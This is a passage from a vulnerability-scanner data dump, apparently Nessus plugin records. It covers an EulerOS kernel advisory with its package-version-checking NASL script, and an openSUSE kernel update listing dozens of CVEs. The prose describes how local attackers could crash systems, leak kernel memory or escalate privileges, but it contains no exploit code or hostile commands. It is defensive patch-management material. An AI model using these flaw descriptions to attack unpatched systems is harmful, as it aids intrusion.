4095 bytes) was left and copied into\n user space. 
An attacker could use this flaw to read\n private information from user space that would not\n otherwise have been accessible.(CVE-2015-5697)\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643)\n\n - Race condition in the sclp_ctl_ioctl_sccb function in\n drivers/s390/char/sclp_ctl.c in the Linux kernel before\n 4.6 allows local users to obtain sensitive information\n from kernel memory by changing a certain length value,\n aka a 'double fetch' vulnerability.(CVE-2016-6130)\n\n - drivers/net/usb/asix_devices.c in the Linux kernel\n through 4.13.11 allows local users to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact via a crafted\n USB device.(CVE-2017-16647)\n\n - A flaw was found in the Linux kernel which could cause\n a kernel panic when restoring machine specific\n registers on the PowerPC platform. Incorrect\n transactional memory state registers could\n inadvertently change the call path on return from\n userspace and cause the kernel to enter an unknown\n state and crash.(CVE-2015-8845)\n\n - fs/namespace.c in the Linux kernel through 3.16.1 does\n not properly restrict clearing MNT_NODEV, MNT_NOSUID,\n and MNT_NOEXEC and changing MNT_ATIME_MASK during a\n remount of a bind mount, which allows local users to\n gain privileges, interfere with backups and auditing on\n systems that had atime enabled, or cause a denial of\n service (excessive filesystem updating) on systems that\n had atime disabled via a 'mount -o remount' command\n within a user namespace.(CVE-2014-5207)\n\n - The NFS2/3 RPC client could send long arguments to the\n NFS server. 
These encoded arguments are stored in an\n array of memory pages, and accessed using pointer\n variables. Arbitrarily long arguments could make these\n pointers point outside the array and cause an\n out-of-bounds memory access. A remote user or program\n could use this flaw to crash the kernel, resulting in\n denial of service.(CVE-2017-7645)\n\n - The time subsystem in the Linux kernel, when\n CONFIG_TIMER_STATS is enabled, allows local users to\n discover real PID values (as distinguished from PID\n values inside a PID namespace) by reading the\n /proc/timer_list file, related to the print_timer\n function in kernel/time/timer_list.c and the\n __timer_stats_timer_set_start_info function in\n kernel/time/timer.c.(CVE-2017-5967)\n\n - A vulnerability was found in the Linux kernel where the\n keyctl_set_reqkey_keyring() function leaks the thread\n keyring. This allows an unprivileged local user to\n exhaust kernel memory and thus cause a\n DoS.(CVE-2017-7472)\n\n - A flaw was found that can be triggered in\n keyring_search_iterator in keyring.c if type->match\n is NULL. 
A local user could use this flaw to crash the\n system or, potentially, escalate their\n privileges.(CVE-2017-2647)\n\n - The make_response function in\n drivers/block/xen-blkback/blkback.c in the Linux kernel\n before 4.11.8 allows guest OS users to obtain sensitive\n information from host OS (or other guest OS) kernel\n memory by leveraging the copying of uninitialized\n padding fields in Xen block-interface response\n structures, aka XSA-216.(CVE-2017-10911)\n\n - Stack-based buffer overflow in the SET_WPS_IE IOCTL\n implementation in wlan_hdd_hostapd.c in the WLAN (aka\n Wi-Fi) driver for the Linux kernel 3.x and 4.x, as used\n in Qualcomm Innovation Center (QuIC) Android\n contributions for MSM devices and other products,\n allows attackers to gain privileges via a crafted\n application that uses a long WPS IE\n element.(CVE-2015-0570)\n\n - The net_ctl_permissions function in net/sysctl_net.c in\n the Linux kernel before 3.11.5 does not properly\n determine uid and gid values, which allows local users\n to bypass intended /proc/sys/net restrictions via a\n crafted application.(CVE-2013-4270)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1478)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7472", "CVE-2016-5828", "CVE-2017-7645", "CVE-2017-5967", "CVE-2013-4270", "CVE-2017-16537", "CVE-2016-2544", "CVE-2015-0570", "CVE-2016-4558", "CVE-2017-10911", "CVE-2017-16647", "CVE-2015-5697", "CVE-2017-16643", "CVE-2017-2647", "CVE-2018-12233", "CVE-2014-5207", "CVE-2016-6130", "CVE-2015-8845", "CVE-2013-4299", "CVE-2018-15572"], "modified": "2019-05-13T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.1.0", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2019-1478.NASL", "href": "https://www.tenable.com/plugins/nessus/124802", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124802);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-4270\",\n \"CVE-2013-4299\",\n \"CVE-2014-5207\",\n \"CVE-2015-0570\",\n \"CVE-2015-5697\",\n \"CVE-2015-8845\",\n \"CVE-2016-2544\",\n \"CVE-2016-4558\",\n \"CVE-2016-5828\",\n \"CVE-2016-6130\",\n \"CVE-2017-10911\",\n \"CVE-2017-16537\",\n \"CVE-2017-16643\",\n \"CVE-2017-16647\",\n \"CVE-2017-2647\",\n \"CVE-2017-5967\",\n \"CVE-2017-7472\",\n \"CVE-2017-7645\",\n \"CVE-2018-12233\",\n \"CVE-2018-15572\"\n );\n 
script_bugtraq_id(\n 63183,\n 64471,\n 69216\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1478)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - In the ea_get function in fs/jfs/xattr.c in the Linux\n kernel through 4.17.1, a memory corruption bug in JFS\n can be triggered by calling setxattr twice with two\n different extended attribute names on the same file.\n This vulnerability can be triggered by an unprivileged\n user with the ability to create files and execute\n programs. A kmalloc call is incorrect, leading to\n slab-out-of-bounds in jfs_xattr.(CVE-2018-12233)\n\n - The spectre_v2_select_mitigation function in\n arch/x86/kernel/cpu/bugs.c in the Linux kernel before\n 4.18.1 does not always fill RSB upon a context switch,\n which makes it easier for attackers to conduct\n userspace-userspace spectreRSB\n attacks.(CVE-2018-15572)\n\n - Race condition in the queue_delete function in\n sound/core/seq/seq_queue.c in the Linux kernel before\n 4.4.1 allows local users to cause a denial of service\n (use-after-free and system crash) by making an ioctl\n call at a certain time.(CVE-2016-2544)\n\n - A flaw was found in the Linux kernel's implementation\n of BPF in which systems can application can overflow a\n 32 bit refcount in both program and map refcount. 
This\n refcount can wrap and end up a use after\n free.(CVE-2016-4558)\n\n - Interpretation conflict in\n drivers/md/dm-snap-persistent.c in the Linux kernel\n through 3.11.6 allows remote authenticated users to\n obtain sensitive information or modify data via a\n crafted mapping to a snapshot block\n device.(CVE-2013-4299)\n\n - The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel through 4.13.11 allows local users to\n cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16537)\n\n - A vulnerability in the handling of Transactional Memory\n on powerpc systems was found. An unprivileged local\n user can crash the kernel by starting a transaction,\n suspending it, and then calling any of the exec() class\n system calls.(CVE-2016-5828)\n\n - A cross-boundary flaw was discovered in the Linux\n kernel software raid driver. The driver accessed a\n disabled bitmap where only the first byte of the buffer\n was initialized to zero. This meant that the rest of\n the request (up to 4095 bytes) was left and copied into\n user space. 
An attacker could use this flaw to read\n private information from user space that would not\n otherwise have been accessible.(CVE-2015-5697)\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643)\n\n - Race condition in the sclp_ctl_ioctl_sccb function in\n drivers/s390/char/sclp_ctl.c in the Linux kernel before\n 4.6 allows local users to obtain sensitive information\n from kernel memory by changing a certain length value,\n aka a 'double fetch' vulnerability.(CVE-2016-6130)\n\n - drivers/net/usb/asix_devices.c in the Linux kernel\n through 4.13.11 allows local users to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact via a crafted\n USB device.(CVE-2017-16647)\n\n - A flaw was found in the Linux kernel which could cause\n a kernel panic when restoring machine specific\n registers on the PowerPC platform. Incorrect\n transactional memory state registers could\n inadvertently change the call path on return from\n userspace and cause the kernel to enter an unknown\n state and crash.(CVE-2015-8845)\n\n - fs/namespace.c in the Linux kernel through 3.16.1 does\n not properly restrict clearing MNT_NODEV, MNT_NOSUID,\n and MNT_NOEXEC and changing MNT_ATIME_MASK during a\n remount of a bind mount, which allows local users to\n gain privileges, interfere with backups and auditing on\n systems that had atime enabled, or cause a denial of\n service (excessive filesystem updating) on systems that\n had atime disabled via a 'mount -o remount' command\n within a user namespace.(CVE-2014-5207)\n\n - The NFS2/3 RPC client could send long arguments to the\n NFS server. 
These encoded arguments are stored in an\n array of memory pages, and accessed using pointer\n variables. Arbitrarily long arguments could make these\n pointers point outside the array and cause an\n out-of-bounds memory access. A remote user or program\n could use this flaw to crash the kernel, resulting in\n denial of service.(CVE-2017-7645)\n\n - The time subsystem in the Linux kernel, when\n CONFIG_TIMER_STATS is enabled, allows local users to\n discover real PID values (as distinguished from PID\n values inside a PID namespace) by reading the\n /proc/timer_list file, related to the print_timer\n function in kernel/time/timer_list.c and the\n __timer_stats_timer_set_start_info function in\n kernel/time/timer.c.(CVE-2017-5967)\n\n - A vulnerability was found in the Linux kernel where the\n keyctl_set_reqkey_keyring() function leaks the thread\n keyring. This allows an unprivileged local user to\n exhaust kernel memory and thus cause a\n DoS.(CVE-2017-7472)\n\n - A flaw was found that can be triggered in\n keyring_search_iterator in keyring.c if type->match\n is NULL. 
A local user could use this flaw to crash the\n system or, potentially, escalate their\n privileges.(CVE-2017-2647)\n\n - The make_response function in\n drivers/block/xen-blkback/blkback.c in the Linux kernel\n before 4.11.8 allows guest OS users to obtain sensitive\n information from host OS (or other guest OS) kernel\n memory by leveraging the copying of uninitialized\n padding fields in Xen block-interface response\n structures, aka XSA-216.(CVE-2017-10911)\n\n - Stack-based buffer overflow in the SET_WPS_IE IOCTL\n implementation in wlan_hdd_hostapd.c in the WLAN (aka\n Wi-Fi) driver for the Linux kernel 3.x and 4.x, as used\n in Qualcomm Innovation Center (QuIC) Android\n contributions for MSM devices and other products,\n allows attackers to gain privileges via a crafted\n application that uses a long WPS IE\n element.(CVE-2015-0570)\n\n - The net_ctl_permissions function in net/sysctl_net.c in\n the Linux kernel before 3.11.5 does not properly\n determine uid and gid values, which allows local users\n to bypass intended /proc/sys/net restrictions via a\n crafted application.(CVE-2013-4270)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1478\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9f1ad85b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 
9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:28:08", "description": "The openSUSE 13.1 kernel was updated to fix security issues and bugs :\n\nSecurity issues fixed: CVE-2014-9322: A local privilege escalation in\nthe x86_64 32bit compatibility signal handling was fixed, which could\nbe used by local attackers to crash the machine or execute code.\n\nCVE-2014-9090: The do_double_fault function in arch/x86/kernel/traps.c\nin the Linux kernel did not properly handle faults associated with the\nStack Segment (SS) segment register, which allowed local users to\ncause a denial of service (panic) via a modify_ldt system call, as\ndemonstrated by sigreturn_32 in the linux-clock-tests test suite.\n\nCVE-2014-8133: Insufficient validation of TLS register usage could\nleak information from the kernel stack to userspace.\n\nCVE-2014-0181: The Netlink implementation in the Linux kernel through\n3.14.1 did not provide a mechanism for authorizing socket operations\nbased on the opener of a socket, which allowed local users to bypass\nintended access restrictions and modify network configurations by\nusing a Netlink socket for the (1) stdout or (2) stderr of a setuid\nprogram. 
(bsc#875051)\n\nCVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on\n32-bit x86 platforms, when syscall auditing is enabled and the sep CPU\nfeature flag is set, allowed local users to cause a denial of service\n(OOPS and system crash) via an invalid syscall number, as demonstrated\nby number 1000.\n\nCVE-2014-3688: The SCTP implementation in the Linux kernel allowed\nremote attackers to cause a denial of service (memory consumption) by\ntriggering a large number of chunks in an association's output queue,\nas demonstrated by ASCONF probes, related to net/sctp/inqueue.c and\nnet/sctp/sm_statefuns.c.\n\nCVE-2014-3687: The sctp_assoc_lookup_asconf_ack function in\nnet/sctp/associola.c in the SCTP implementation in the Linux kernel\nallowed remote attackers to cause a denial of service (panic) via\nduplicate ASCONF chunks that trigger an incorrect uncork within the\nside-effect interpreter.\n\nCVE-2014-7975: The do_umount function in fs/namespace.c in the Linux\nkernel did not require the CAP_SYS_ADMIN capability for do_remount_sb\ncalls that change the root filesystem to read-only, which allowed\nlocal users to cause a denial of service (loss of writability) by\nmaking certain unshare system calls, clearing the / MNT_LOCKED flag,\nand making an MNT_FORCE umount system call.\n\nCVE-2014-8884: Stack-based buffer overflow in the\nttusbdecfe_dvbs_diseqc_send_master_cmd function in\ndrivers/media/usb/ttusb-dec/ttusbdecfe.c in the Linux kernel allowed\nlocal users to cause a denial of service (system crash) or possibly\ngain privileges via a large message length in an ioctl call.\n\nCVE-2014-3673: The SCTP implementation in the Linux kernel allowed\nremote attackers to cause a denial of service (system crash) via a\nmalformed ASCONF chunk, related to net/sctp/sm_make_chunk.c and\nnet/sctp/sm_statefuns.c.\n\nCVE-2014-3186: Buffer overflow in the picolcd_raw_event function in\ndevices/hid/hid-picolcd_core.c in the PicoLCD HID device driver in the\nLinux kernel, 
as used in Android on Nexus 7 devices, allowed\nphysically proximate attackers to cause a denial of service (system\ncrash) or possibly execute arbitrary code via a crafted device that\nsends a large report.\n\nCVE-2014-7841: The sctp_process_param function in\nnet/sctp/sm_make_chunk.c in the SCTP implementation in the Linux\nkernel, when ASCONF is used, allowed remote attackers to cause a\ndenial of service (NULL pointer dereference and system crash) via a\nmalformed INIT chunk.\n\nCVE-2014-4611: Integer overflow in the LZ4 algorithm implementation,\nas used in Yann Collet LZ4 before r118 and in the lz4_uncompress\nfunction in lib/lz4/lz4_decompress.c in the Linux kernel before\n3.15.2, on 32-bit platforms might allow context-dependent attackers to\ncause a denial of service (memory corruption) or possibly have\nunspecified other impact via a crafted Literal Run that would be\nimproperly handled by programs not complying with an API limitation, a\ndifferent vulnerability than CVE-2014-4715.\n\nCVE-2014-4608: Multiple integer overflows in the lzo1x_decompress_safe\nfunction in lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor in\nthe Linux kernel allowed context-dependent attackers to cause a denial\nof service (memory corruption) via a crafted Literal Run.\n\nCVE-2014-8709: The ieee80211_fragment function in net/mac80211/tx.c in\nthe Linux kernel did not properly maintain a certain tail pointer,\nwhich allowed remote attackers to obtain sensitive cleartext\ninformation by reading packets.\n\nCVE-2014-3185: Multiple buffer overflows in the\ncommand_port_read_callback function in drivers/usb/serial/whiteheat.c\nin the Whiteheat USB Serial Driver in the Linux kernel allowed\nphysically proximate attackers to execute arbitrary code or cause a\ndenial of service (memory corruption and system crash) via a crafted\ndevice that provides a large amount of (1) EHCI or (2) XHCI data\nassociated with a bulk response.\n\nCVE-2014-3184: The report_fixup functions in the 
HID subsystem in the\nLinux kernel might have allowed physically proximate attackers to\ncause a denial of service (out-of-bounds write) via a crafted device\nthat provides a small report descriptor, related to (1)\ndrivers/hid/hid-cherry.c, (2) drivers/hid/hid-kye.c, (3)\ndrivers/hid/hid-lg.c, (4) drivers/hid/hid-monterey.c, (5)\ndrivers/hid/hid-petalynx.c, and (6) drivers/hid/hid-sunplus.c.\n\nCVE-2014-3182: Array index error in the logi_dj_raw_event function in\ndrivers/hid/hid-logitech-dj.c in the Linux kernel allowed physically\nproximate attackers to execute arbitrary code or cause a denial of\nservice (invalid kfree) via a crafted device that provides a malformed\nREPORT_TYPE_NOTIF_DEVICE_UNPAIRED value.\n\nCVE-2014-3181: Multiple stack-based buffer overflows in the\nmagicmouse_raw_event function in drivers/hid/hid-magicmouse.c in the\nMagic Mouse HID driver in the Linux kernel allowed physically\nproximate attackers to cause a denial of service (system crash) or\npossibly execute arbitrary code via a crafted device that provides a\nlarge amount of (1) EHCI or (2) XHCI data associated with an event.\n\nCVE-2014-7826: kernel/trace/trace_syscalls.c in the Linux kernel did\nnot properly handle private syscall numbers during use of the ftrace\nsubsystem, which allowed local users to gain privileges or cause a\ndenial of service (invalid pointer dereference) via a crafted\napplication.\n\nCVE-2013-7263: The Linux kernel updated certain length values before\nensuring that associated data structures have been initialized, which\nallowed local users to obtain sensitive information from kernel stack\nmemory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call,\nrelated to net/ipv4/ping.c, net/ipv4/raw.c, net/ipv4/udp.c,\nnet/ipv6/raw.c, and net/ipv6/udp.c. This update fixes the leak of the\nport number when using ipv6 sockets. 
(bsc#853040).\n\nCVE-2013-2898: Fixed potential kernel caller confusion via\npast-end-of-heap-allocation read in sensor-hub HID driver.\n\nCVE-2013-2891: Fixed 16 byte past-end-of-heap-alloc zeroing in\nsteelseries HID driver.\n\nCVE-2014-6410: The __udf_read_inode function in fs/udf/inode.c in the\nLinux kernel did not restrict the amount of ICB indirection, which\nallowed physically proximate attackers to cause a denial of service\n(infinite loop or stack consumption) via a UDF filesystem with a\ncrafted inode.\n\nCVE-2014-5471: Stack consumption vulnerability in the\nparse_rock_ridge_inode_internal function in fs/isofs/rock.c in the\nLinux kernel allowed local users to cause a denial of service\n(uncontrolled recursion, and system crash or reboot) via a crafted\niso9660 image with a CL entry referring to a directory entry that has\na CL entry.\n\nCVE-2014-5472: The parse_rock_ridge_inode_internal function in\nfs/isofs/rock.c in the Linux kernel allowed local users to cause a\ndenial of service (unkillable mount process) via a crafted iso9660\nimage with a self-referential CL entry.\n\nCVE-2014-0206: Array index error in the aio_read_events_ring function\nin fs/aio.c in the Linux kernel allowed local users to obtain\nsensitive information from kernel memory via a large head value.\n\nCVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on\n32-bit x86 platforms, when syscall auditing is enabled and the sep CPU\nfeature flag is set, allowed local users to cause a denial of service\n(OOPS and system crash) via an invalid syscall number, as demonstrated\nby number 1000.\n\nCVE-2014-5206: The do_remount function in fs/namespace.c in the Linux\nkernel did not maintain the MNT_LOCK_READONLY bit across a remount of\na bind mount, which allowed local users to bypass an intended\nread-only restriction and defeat certain sandbox protection mechanisms\nvia a 'mount -o remount' command within a user namespace.\n\nCVE-2014-5207: fs/namespace.c in the Linux kernel did 
not properly\nrestrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\nMNT_ATIME_MASK during a remount of a bind mount, which allowed local\nusers to gain privileges, interfere with backups and auditing on\nsystems that had atime enabled, or cause a denial of service\n(excessive filesystem updating) on systems that had atime disabled via\na 'mount -o remount' command within a user namespace.\n\nCVE-2014-1739: The media_device_enum_entities function in\ndrivers/media/media-device.c in the Linux kernel did not initialize a\ncertain data structure, which allowed local users to obtain sensitive\ninformation from kernel memory by leveraging /dev/media0 read access\nfor a MEDIA_IOC_ENUM_ENTITIES ioctl call.\n\nCVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the\nLinux kernel allowed local users to gain privileges by leveraging\ndata-structure differences between an l2tp socket and an inet socket.\n\nCVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on\n32-bit x86 platforms, when syscall auditing is enabled and the sep CPU\nfeature flag is set, allowed local users to cause a denial of service\n(OOPS and system crash) via an invalid syscall number, as demonstrated\nby number 1000.\n\nCVE-2014-5077: The sctp_assoc_update function in net/sctp/associola.c\nin the Linux kernel, when SCTP authentication is enabled, allowed\nremote attackers to cause a denial of service (NULL pointer\ndereference and OOPS) by starting to establish an association between\ntwo endpoints immediately after an exchange of INIT and INIT ACK\nchunks to establish an earlier association between these endpoints in\nthe opposite direction.\n\nCVE-2014-4171: mm/shmem.c in the Linux kernel did not properly\nimplement the interaction between range notification and hole\npunching, which allowed local users to cause a denial of service\n(i_mutex hold) by using the mmap system call to access a hole, as\ndemonstrated by interfering with intended shmem activity by 
blocking\ncompletion of (1) an MADV_REMOVE madvise call or (2) an\nFALLOC_FL_PUNCH_HOLE fallocate call.\n\nAlso the following bugs were fixed :\n\n - KEYS: Fix stale key registration at error path\n (bnc#908163).\n\n - parport: parport_pc, do not remove parent devices early\n (bnc#856659).\n\n - xfs: fix directory hash ordering bug.\n\n - xfs: mark all internal workqueues as freezable\n (bnc#899785).\n\n - [media] uvc: Fix destruction order in uvc_delete()\n (bnc#897736).\n\n - cfq-iosched: Fix wrong children_weight calculation\n (bnc#893429).\n\n - target/rd: Refactor rd_build_device_space +\n rd_release_device_space (bnc#882639).\n\n - Btrfs: Fix memory corruption by ulist_add_merge() on\n 32bit arch (bnc#887046).\n\n - usb: pci-quirks: Prevent Sony VAIO t-series from\n switching usb ports (bnc#864375).\n\n - xhci: Switch only Intel Lynx Point-LP ports to EHCI on\n shutdown (bnc#864375).\n\n - xhci: Switch Intel Lynx Point ports to EHCI on shutdown\n (bnc#864375).\n\n - ALSA: hda - Fix broken PM due to incomplete i915\n initialization (bnc#890114).\n\n - netbk: Don't destroy the netdev until the vif is shut\n down (bnc#881008).\n\n - swiotlb: don't assume PA 0 is invalid (bnc#865882).\n\n - PM / sleep: Fix request_firmware() error at resume\n (bnc#873790).\n\n - usbcore: don't log on consecutive debounce failures of\n the same port (bnc#818966).", "edition": 19, "published": "2014-12-22T00:00:00", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-SU-2014:1677-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5077", "CVE-2014-3182", "CVE-2013-2898", "CVE-2014-3186", "CVE-2014-3673", "CVE-2014-1739", "CVE-2014-9090", "CVE-2014-3688", "CVE-2014-7841", "CVE-2013-2891", "CVE-2014-4508", "CVE-2014-4943", "CVE-2014-9322", "CVE-2014-0206", "CVE-2014-3181", "CVE-2014-8709", "CVE-2014-4171", "CVE-2014-5472", "CVE-2014-7975", "CVE-2014-3185", "CVE-2014-5206", "CVE-2014-4715", "CVE-2014-8884", "CVE-2014-4608", "CVE-2014-4611", 
"CVE-2013-7263", "CVE-2014-0181", "CVE-2014-5207", "CVE-2014-6410", "CVE-2014-5471", "CVE-2014-8133", "CVE-2014-7826", "CVE-2014-3184", "CVE-2014-3687"], "modified": "2014-12-22T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:hdjmod-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:xen-doc-html", "p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:hdjmod-kmp-default", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-pae", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools", "p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:crash-eppic", "p-cpe:/a:novell:opensuse:kernel-pae-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen", "p-cpe:/a:novell:opensuse:vhba-kmp-debugsource", "p-cpe:/a:novell:opensuse:pcfclock-debuginfo", "p-cpe:/a:novell:opensuse:xen-devel", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace", "p-cpe:/a:novell:opensuse:kernel-ec2-base", "p-cpe:/a:novell:opensuse:ipset-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-debugsource", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop", "p-cpe:/a:novell:opensuse:virtualbox-qt", "p-cpe:/a:novell:opensuse:kernel-ec2", "p-cpe:/a:novell:opensuse:hdjmod-kmp-pae-debuginfo", 
